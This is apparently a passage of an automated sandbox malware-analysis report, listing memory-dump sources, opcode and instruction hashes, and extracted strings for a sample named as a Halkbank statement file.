                                                              • Snapshot File: hcaresult_3_2_6630000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2712cbc6e391ecdbe6981bced3ceb12412bca123d88f0abfd27f90f277069979
                                                              • Instruction ID: cfd72af6c229cb9b3adf90d3dec6eeb7c0cebaedfcba5bf9894f1c6ba72b2859
                                                              • Opcode Fuzzy Hash: 2712cbc6e391ecdbe6981bced3ceb12412bca123d88f0abfd27f90f277069979
                                                              • Instruction Fuzzy Hash: 6401E470E0022A9FCF54EFB9C8106AEBBB5AF48200F10852AD419E7250E7385A028BD0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ab4d233543e305cc12247cda6c560dc49e6e9dcf16538d8425bf7b316c378346
                                                              • Instruction ID: 9f06c2be6a7c9c062da335d92d66f97fec08a80677f5f66751b54b8039c8eccc
                                                              • Opcode Fuzzy Hash: ab4d233543e305cc12247cda6c560dc49e6e9dcf16538d8425bf7b316c378346
                                                              • Instruction Fuzzy Hash: 3BE09232C243AA5BC702A7B098504EEBF389D9222475541B2D058AB042E720268ECBB1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2fb1d0c3021f4a75eddd8d1045f6d6a413cbdddf3866bb9b9845349b3a062575
                                                              • Instruction ID: 2d6707e3fd42b7d1f3103e89c27e73df1d19edefd0e9b4ef59037cf632b731a8
                                                              • Opcode Fuzzy Hash: 2fb1d0c3021f4a75eddd8d1045f6d6a413cbdddf3866bb9b9845349b3a062575
                                                              • Instruction Fuzzy Hash: 67D05B31D2022B97CB11E7A5DC044DFF738EED5265B504626D51837140FB703659C6E1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                              • Instruction ID: 81dedf74df996ee8b00fb52072daf04db6bde4f79a284f4bc5eea56833306f5f
                                                              • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                              • Instruction Fuzzy Hash: F5C0807350C1282AB236504E7C41DE7BB8CD3C13B4D114177F95CD3341D8425C4001F4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f2258a460b7e0b90445608039faaba0d8203a4bbd4926a0e29589b59370a43fc
                                                              • Instruction ID: 54ca22bd4c84b457e0f8e3553f8763448b0d0533f6fd05854b939e8747f49292
                                                              • Opcode Fuzzy Hash: f2258a460b7e0b90445608039faaba0d8203a4bbd4926a0e29589b59370a43fc
                                                              • Instruction Fuzzy Hash: 7AD0173AB00008DFCF108F8CE850CDDB7B6FB9C221B008026E911A3260C6319821CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4559d8efb36addbfa4a37cfd4b2dbcbc6fa954c9d23c0d24c3a46e01ea490b9e
                                                              • Instruction ID: a83c8190285b792b01c9db4f2ad9ab7ccedc0bc60687cf77e2dd5a8b62132387
                                                              • Opcode Fuzzy Hash: 4559d8efb36addbfa4a37cfd4b2dbcbc6fa954c9d23c0d24c3a46e01ea490b9e
                                                              • Instruction Fuzzy Hash: A4D0C27050C3864BC312B3B0E9524543B2AAB82308BB44594BC464E41BE9BD184583A1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2e8d8e10ce5e0ab68643776b0fe1a3ff7fc02945b5628a2d5702726b74b17558
                                                              • Instruction ID: 0c180a1c2c13fe73fb8d5f5b8515e749763716adde8aa2fc64f162789b0194e4
                                                              • Opcode Fuzzy Hash: 2e8d8e10ce5e0ab68643776b0fe1a3ff7fc02945b5628a2d5702726b74b17558
                                                              • Instruction Fuzzy Hash: 46D04275E4401DCBCF30EFA8E4444DCBBB0EF88316F24546AD965A3211D63155558F11
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224948863.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6630000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: "$0o@p$Lj@p$Lj@p$Lj@p$Lj@p$Lj@p$Lj@p$Lj@p$Lj@p$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q
                                                              • API String ID: 0-1947560563
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224948863.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6630000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: "$0o@p$Haq$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q
                                                              • API String ID: 0-401091292
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224948863.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6630000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Xaq$Xaq$Xaq$Xaq
                                                              • API String ID: 0-4015495023
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224948863.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6630000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Xaq$Xaq$Xaq$Xaq
                                                              • API String ID: 0-4015495023
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: \;]q$\;]q$\;]q$\;]q
                                                              • API String ID: 0-2351511683
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%